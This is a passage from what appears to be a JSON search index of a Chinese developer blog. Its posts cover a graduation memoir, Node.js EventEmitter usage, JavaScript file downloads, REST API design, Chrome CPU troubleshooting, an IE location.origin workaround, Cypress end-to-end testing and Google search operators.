似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校开展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班做地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我凭能力向别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,达到每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日子过得很苦,但是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店的拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】\n","permalink":"https://wdd.js.org/posts/2018/08/the-rest-of-your-life/","summary":"大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什么特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 
似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校开展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班做地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我凭能力向别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,达到每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日子过得很苦,但是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店的拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】","title":"毕业后,青春像一艘船,沉入海底"},{"content":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 
传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.log(a, b, this, this === myEmitter) }) myEmitter.emit(\u0026#39;event\u0026#39;, \u0026#39;a\u0026#39;, {name:\u0026#39;wdd\u0026#39;}) 输出:\na { name: \u0026#39;wdd\u0026#39; } MyEmitter { domain: null, _events: { event: [ [Function], [Function] ] }, _eventsCount: 1, _maxListeners: undefined } true a { name: \u0026#39;wdd\u0026#39; } {} false 4. 同步还是异步调用listeners? emit()法会同步按照事件注册的顺序执行回调 // 03.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;01 an event occurred!\u0026#39;) }) myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;02 an event occurred!\u0026#39;) }) console.log(1) myEmitter.emit(\u0026#39;event\u0026#39;) console.log(2) 输出:\n1 01 an event occurred! 02 an event occurred! 2 深入思考,为什么事件回调要同步?异步了会有什么问题?\n同步去调用事件监听者,能够确保按照注册顺序去调用事件监听者,并且避免竞态条件和逻辑错误。\n5. 如何只订阅一次事件? 使用once去只订阅一次事件 // 04.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() let m = 0 myEmitter.once(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(++m) }) myEmitter.emit(\u0026#39;event\u0026#39;) myEmitter.emit(\u0026#39;event\u0026#39;) 6. 
不订阅,就发飙的错误事件 error是一个特别的事件名,当这个事件被触发时,如果没有对应的事件监听者,则会导致程序崩溃。\nevents.js:183 throw er; // Unhandled \u0026#39;error\u0026#39; event ^ Error: test at Object.\u0026lt;anonymous\u0026gt; (/Users/xxx/github/node-note/events/05.js:12:25) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Function.Module.runMain (module.js:676:10) at startup (bootstrap_node.js:187:16) at bootstrap_node.js:608:3 所以,最好总是给EventEmitter实例添加一个error的监听器\nconst EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { console.log(err) }) console.log(1) myEmitter.emit(\u0026#39;error\u0026#39;, new Error(\u0026#39;test\u0026#39;)) console.log(2) 7. 内部事件 newListener与removeListener newListener与removeListener是EventEmitter实例的自带的事件,你最好不要使用同样的名字作为自定义的事件名。\nnewListener在订阅者被加入到订阅列表前触发 removeListener在订阅者被移除订阅列表后触发 // 06.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;newListener\u0026#39;, (event, listener) =\u0026gt; { console.log(\u0026#39;----\u0026#39;) console.log(event) console.log(listener) }) myEmitter.on(\u0026#39;myEmitter\u0026#39;, (err) =\u0026gt; { console.log(err) }) 输出:\n从输出可以看出,即使没有去触发myEmitter事件,on()方法也会触发newListener事件。\n---- myEmitter [Function] 8. 
事件监听数量限制 myEmitter.listenerCount(\u0026rsquo;event\u0026rsquo;): 用来计算一个实例上某个事件的监听者数量 EventEmitter.defaultMaxListeners: EventEmitter类默认的最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.getMaxListeners(): EventEmitter实例默认的某个事件最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.eventNames(): 返回一个实例上有多少种事件 EventEmitter和EventEmitter实例的最大监听数量为10并不是一个硬性规定,只是一个推荐值,该值可以通过setMaxListeners()接口去改变。\n改变EventEmitter的最大监听数量会影响到所有EventEmitter实例 改变EventEmitter实例的最大监听数量只会影响到实例自身 如无必要,最好不要去改变默认的监听数量限制。事件监听数量是node检测内存泄露的一个维度。\nEventEmitter实例的最大监听数量不是一个实例的所有监听数量。\n例如同一个实例A类型事件5个监听者,B类型事件6个监听者,这个并不会有告警。如果A类型有11个监听者,就会有告警提示。\n如果在实践中发现类似的告警提示Possible EventEmitter memory leak detected,要知道从事件最大监听数的角度去排查问题。\n// 07.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() const maxListeners = 11 for (let i = 0; i \u0026lt; maxListeners; i++) { myEmitter.on(\u0026#39;event\u0026#39;, (err) =\u0026gt; { console.log(err, 1) }) } myEmitter.on(\u0026#39;event1\u0026#39;, (err) =\u0026gt; { console.log(err, 11) }) console.log(myEmitter.listenerCount(\u0026#39;event\u0026#39;)) console.log(EventEmitter.defaultMaxListeners) console.log(myEmitter.getMaxListeners()) console.log(myEmitter.eventNames()) 输出:\n11 10 10 [ \u0026#39;event\u0026#39;, \u0026#39;event1\u0026#39; ] (node:23957) MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 event listeners added. Use emitter.setMaxListeners() to increase limit ","permalink":"https://wdd.js.org/posts/2018/08/deepin-nodejs-events/","summary":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 
传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.","title":"NodeJS Events 模块笔记"},{"content":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","permalink":"https://wdd.js.org/posts/2018/06/js-download-file/","summary":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","title":"JavaScript动态下载文件"},{"content":" 1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. 
REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - upgrade a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不回影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让客户端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services ","permalink":"https://wdd.js.org/posts/2018/06/think-about-restful-api/","summary":"1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 
表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。","title":"Restful API 架构思考"},{"content":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 
关于动态背景图的思考 动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题\n","permalink":"https://wdd.js.org/posts/2018/06/how-to-fix-google-chrome-very-high-cpu-cost/","summary":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 关于动态背景图的思考 动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题","title":"记一次如何解决谷歌浏览器占用过高cpu问题过程"},{"content":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? 
\u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); }i ","permalink":"https://wdd.js.org/posts/2018/05/ie-not-support-location-origin/","summary":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? \u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); }i ","title":"IE浏览器不支持location.origin"},{"content":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electon, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试有失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要在使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers. The same functionality you love from unit testing is right at your fingertips. 网络流量控制 在不涉及服务器的情况下轻松控制,存根和测试边缘案例。无论你喜欢,你都可以存储网络流量。 一致的结果 我们的架构不使用Selenium或WebDriver。向快速,一致和可靠的无剥落测试问好。 截图和视频 查看失败时自动截取的截图,或无条件运行时整个测试套件的视频。 4. 安装cypress 4.1. 使用npm方法安装 注意这个方法需要下载压缩过Electron, 所以可能会花费几分钟时间,请耐心等待。\nnpm i cypress -D 4.2. 直接下载Cypress客户端 你可以把Cypress想想成一个浏览器,可以单独把它下载下来,安装到电脑上,当做一个客户端软件来用。\n打开之后就是这个样子,可以手动去打开项目,运行测试用例。\n5. 
初始化Cypress Cypress初始化,会在项目根目录自动生成cypress文件夹,并且里面有些测试用例模板,可以很方便的学习。\n初始化的方法有两种。\n如果你下载的客户端,那么你用客户端打开项目时,它会检测项目目录下有没有Cypress目录,如果没有,就自动帮你生成模板。\n如果你使用npm安装的Cypress,可以使用命令node_modules/.bin/cypress open去初始化\n6. 编写测试用例 // hacker-news.js describe(\u0026#39;Hacker News登录测试\u0026#39;, () =\u0026gt; { it(\u0026#39;登录页面\u0026#39;, () =\u0026gt; { cy.visit(\u0026#39;https://news.ycombinator.com/login?goto=news\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;acct\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;test\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;pw\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;123456\u0026#39;) cy.get(\u0026#39;input[value=\u0026#34;login\u0026#34;]\u0026#39;).click() cy.contains(\u0026#39;Bad login\u0026#39;) }) }) 7. 查看结果 打开Cypress客户端,选择要测试项目的根目录,点击hacker-news.js后,测试用例就会自动运行\n运行结束后,左侧栏目鼠标移动上去,右侧栏都会显示出该步骤的截图,所以叫做时光穿梭功能。\n从截图也可以看出来,Cypress的步骤描述很详细。\n","permalink":"https://wdd.js.org/posts/2018/05/e2e-testing-hacker-news-with-cypress/","summary":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electon, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试有失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要在使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers.","title":"端到端测试哪家强?不容错过的Cypress"},{"content":" 1. 谷歌搜索指令 2. 基本命令 3. 
关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | \u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .. | 区间查询 AB之间 | A..B | | china 1888..2000 | 匹配任意字符 | | | node* java site: | 站内搜索 | A site:B | | | DLL site:webpack.js.org filetype: | 按照文件类型搜索 | A filetype:B | | csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会导致不同的返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2018/04/master-google-search-command/","summary":"1. 谷歌搜索指令 2. 基本命令 3. 关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | 